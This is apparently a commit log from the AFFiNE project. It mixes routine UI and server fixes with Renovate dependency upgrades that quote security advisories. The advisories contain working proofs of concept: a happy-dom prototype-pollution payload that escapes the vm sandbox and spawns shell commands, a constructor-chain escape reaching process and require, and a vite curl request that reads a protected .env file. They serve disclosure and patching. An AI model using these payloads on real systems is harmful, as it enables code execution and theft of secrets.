a47042cbd5 |
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates:

| Package | Change |
|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) |

### GitHub Vulnerability Alerts

#### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5)

### Summary

The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.

### Details

The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (universal) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).

### PoC

Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().

```js
import { Browser } from "happy-dom";

const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});
page.url = 'https://example.com';

let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'

page.content = `<html>
<script>
function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";}
this.constructor.constructor.__proto__.__proto__.toString = f;
this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
// Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
</script>
<body>Hello world!</body></html>`;

await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));
```

### Impact

Arbitrary code execution via breaking out of the Node.js' vm isolation.

### Recommended Immediate Actions

Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead.

Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.

---

### Release Notes

<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>

### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2)

[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2)

##### :construction\_worker\_man: Patch fixes

- Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934)

### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1)

[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1)

##### :construction\_worker\_man: Patch fixes

- Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932)
  - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this!
  - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
2c44d3abc6 |
chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates:

| Package | Change |
|---|---|
| [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) |
| [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.0.3` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) |

### GitHub Vulnerability Alerts

#### [CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7)

### Summary

Files denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\` when the dev server is running on Windows.

### Impact

Only apps that match the following conditions are affected:

- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))
- running the dev server on Windows

### Details

`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns could be bypassed by using a backslash (`\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.

### PoC

```shell
npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env\ http://localhost:5173
```

<img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" />

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

### [`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small)

[Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11)

##### Bug Fixes

- **dev:** trim trailing slash before `server.fs.deny` check ([#20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5]( |
||
|
|
01c164a78a | fix(server): rcat event parse (#13781) | ||
|
|
5c0e3b8a7f |
fix(editor): missing signal of optional flat props (#13762)
Close https://github.com/toeverything/AFFiNE/issues/13750

#### PR Dependency Tree

* **PR #13762** 👈

This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **New Features**
  * Optional block properties are now supported (e.g., flat-table), with default values applied automatically when not set.
* **Bug Fixes**
  * More reliable initialization and syncing of block properties, ensuring defaults appear consistently.
  * Change notifications now correctly reflect updates to optional/defaulted properties.
* **Tests**
  * Added tests verifying optional property behavior, default application, syncing, and change events.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.1-beta.0 v0.25.1 |
||
|
|
e4f9d42990 |
fix(core): can not scroll all page list in MacOS 26 (#13763)
Close https://github.com/toeverything/AFFiNE/issues/13754

#### PR Dependency Tree

* **PR #13763** 👈

This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Style**
  * Updated page layout sizing to no longer force full-height on the docs body, allowing height to adapt to content.
  * Improves natural scrolling and reduces layout constraints in the workspace “All” page.
  * Enhances responsiveness across varying screen sizes by relying on content and container sizing rules.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
59d8d0fbae |
fix(editor): text align not work (#13740)
#### PR Dependency Tree

* **PR #13740** 👈

This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Bug Fixes**
  * Improved reliability of updating block alignment when the current selection isn’t explicitly defined. The editor now retrieves the selection more consistently, reducing cases where alignment controls appeared unresponsive or had no effect.
  * Covers scenarios during initialization or edge cases where selection was previously missed, resulting in smoother editing and fewer false negatives when applying alignment.
  * No changes to visible UI or shortcuts; behavior is simply more consistent.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
50f41c2212 |
chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates:

| Package | Change |
|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`^18.0.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) |

### GitHub Vulnerability Alerts

#### [CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f)

# Escape of VM Context gives access to process level functionality

## Summary

Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.

A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. What the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules.

Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.

## Reproduce

### CommonJS (Possible to get hold of require)

```javascript
const { Window } = require('happy-dom');
const window = new Window({ console });
window.document.write(`
  <script>
    const process = this.constructor.constructor('return process')();
    const require = process.mainModule.require;
    console.log('Files:', require('fs').readdirSync('.').slice(0,3));
  </script>
`);
```

### ESM (Not possible to get hold of import or require)

```javascript
const { Window } = require('happy-dom');
const window = new Window({ console });
window.document.write(`
  <script>
    const process = this.constructor.constructor('return process')();
    console.log('PID:', process.pid);
  </script>
`);
```

## Potential Impact

#### Server-Side Rendering (SSR)

```javascript
const { Window } = require('happy-dom');
const window = new Window();
window.document.innerHTML = userControlledHTML;
```

#### Testing Frameworks

Any test suite using Happy-DOM with untrusted content may be at risk.

## Attack Scenarios

1. **Data Exfiltration**: Access to environment variables, configuration files, secrets
2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).
3. **Code Execution**: Child process access for running arbitrary commands
4. **Persistence**: File system access

## Recommended Immediate Actions

1. Update Happy DOM to v20 or above
   - This version has JavaScript evaluation disabled by default
   - This version will output a warning if JavaScript is enabled in an insecure environment
2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled
   - This makes sure that evaluation can't be used at process level to escape the VM
   - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk
   - Happy DOM v20 and above will output a warning if this flag is not in use
3. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment

## Technical Root Cause

All classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it's possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it's possible to execute code at process level. Running Node with the "--disallow-code-generation-from-strings" flag protects against this.

---

### Release Notes

<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>

### [`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405)

[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0)

### [`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2)

[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2)

##### :construction\_worker\_man: Patch fixes

- Fixes issue related to CSS pseudo selector `:scope` that didn't work correctly for direct descendants to root - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620)

### [`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1)

[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1)

##### :construction\_worker\_man: Patch fixes

- Fixes issue with sending in URLs as string in `@happy-dom/server-renderer` config using CLI - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908)

### [`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0)

[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0)

##### 💣 Breaking Changes

- Removes support for CommonJS - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
  - Support for CommonJS is no longer needed as Node.js v18 is deprecated and v20 and above supports loading ES modules from CommonJS using `require()`
- Updates Jest to v30 in the `@happy-dom/jest-environment` package - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Makes Jest packages peer dependencies to make it easier to align versions with the project using `@happy-dom/jest-environment` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)

##### 🎨 Features

- Adds a new package called `@happy-dom/server-renderer` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
  - This package provides a simple way to statically render (SSG) or server-side render (SSR) your client-side application
  - Read more in the Wiki under [Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer)
- Adds support for `import.meta` to the ESM compiler - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the CSS pseudo selector `:scope` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620)
- Improves support for `MediaList` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `CSSKeywordValue`, `CSSStyleValue`, `StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Improves debug information in the ESM compiler - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds validation of browser settings when creating a new `Browser` instance - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the browser setting [navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to inject event listeners or logic before content is loaded to the document when navigating a browser frame - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the browser setting [fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which provides a declarative and simple way to add request headers - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for setting an object to [timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define different settings for `setTimeout()` and `requestAnimationFrame()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the browser setting [viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define a default viewport size - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the parameters `beforeContentCallback` and `headers` to `BrowserFrame.goto()`, `BrowserFrame.goBack()`, `BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and `BrowserFrame.reload()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `PopStateEvent` and trigger the event when navigating the page history using `History.pushState()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Use local file paths for virtual server files in stack traces - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `ResponseCache.fileSystem.load()` and `ResponseCache.fileSystem.save()` for storing and loading cache from the file system - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)

##### :construction\_worker\_man: Patch fixes

- Fixes a bug in the ESM compiler that caused it to fail to parse certain code - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Disables the same origin policy when navigating a browser frame using `BrowserFrame.goto()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Fixes bug where CSS selectors with the pseudos "+" and ">" failed for selectors without arguments - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds try and catch to listeners for events dispatched from `XMLHttpRequest` to prevent it from being set to an invalid state if a listener throws an Error - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
a35332634a |
fix(core): correct doc icon padding in editor header (#13721)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Style**
  * Refined vertical spacing in the document icon picker header, reducing excess top padding and setting a consistent bottom padding for a cleaner, tighter layout.
  * Improves visual alignment and readability without altering functionality—interactions and behavior remain unchanged.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.0 |
||
|
|
0063f039a7 |
feat(server): allow cleanup session for deleted docs (#13720)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Bug Fixes**
  * Resolved occasional errors when removing document links from sessions, ensuring cleanup completes reliably.
  * Improved reliability during maintenance actions by preventing unnecessary validation failures in system-initiated updates, while preserving existing checks for user-initiated changes.
* **Chores**
  * Internal adjustments to the session update flow to better support maintenance operations without affecting user-facing behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.0-beta.5 |
||
|
|
d80ca57e94 |
fix(core): change doc icon layout to avoid incorrect color caused by the transform (#13719)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Style**
  * Updated document title styling for improved readability (larger font, increased line height, heavier weight).
  * Refined spacing so titles align correctly when a document icon is present (no extra top padding).
  * Improved emoji rendering by using a consistent font and removing an unnecessary visual artifact.
  * Simplified title container behavior to ensure stable, predictable alignment without placeholder-based shifts.
* **Chores**
  * Minor UI cleanup and consistency adjustments for the icon/title area.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
c63e3e7fe6 |
fix(ios): adopt smaller font size for small device (#13715)
This pull request makes minor adjustments to the iOS frontend app, focusing on UI fine-tuning and improving type safety for concurrency. The most notable changes are a small font size adjustment in the paywall badge, marking an enum as `Sendable` for safer concurrency, and removing a StoreKit configuration reference from the Xcode scheme.

UI adjustments:

* Reduced the font size for the badge text in `PackageOptionView` from 12 to 10 for a more refined appearance.

Concurrency and type safety:

* Added the `Sendable` protocol conformance to the `SKUnitCategory` enum to ensure it can be safely used across concurrency boundaries.

Project configuration:

* Removed the `StoreKitConfigurationFileReference` from the `App.xcscheme`, which may help streamline scheme configuration or prevent unnecessary StoreKit file usage during app launch.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- Style
  - Tweaked paywall option badge text size for a cleaner, more polished look.
- Refactor
  - Improved concurrency safety in underlying models to enhance stability.
- Chores
  - Removed a development-only StoreKit configuration from the iOS debug launch setup.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.0-beta.4 |
||
|
|
05d373081a |
fix(server): update email verified at oauth (#13714)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **New Features**
  * Automatic email verification when signing in or reconnecting with a linked OAuth provider: if the provider confirms the same email and your account was unverified, your email will be marked as verified automatically.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
26fbde6b62 |
fix(core): quick search modal on mobile device (#13694)
When searching on a mobile device, the search modal is wider than the screen, making it hard to use

<img width="345" height="454" alt="Screenshot 2025-10-04 at 17 43 54" src="https://github.com/user-attachments/assets/10594459-86c5-470b-a22f-578363694383" />

Now with the fix applied, it is usable

<img width="350" height="454" alt="Screenshot 2025-10-04 at 17 44 14" src="https://github.com/user-attachments/assets/eb783f5b-e3b6-4b7d-8f31-0d876911d95f" />

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- **Style**
  - Improved mobile responsiveness of the Quick Search modal. On screens 520px wide or smaller, the modal content now adapts its width instead of enforcing a minimum, reducing overflow and improving readability on small devices.
  - No visual or behavioral changes on larger screens; existing layouts and interactions remain unchanged.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
072b5b22df |
fix(core): display affine icon in lit correctly (#13708)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- New Features
  - Added an alternative icon rendering option for document icons, delivering crisper visuals and consistent emoji/icon display.
- Style
  - Improved icon alignment and sizing within grouped icon buttons for more consistent centering and appearance.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

Co-authored-by: Wu Yue <akumatus@gmail.com> |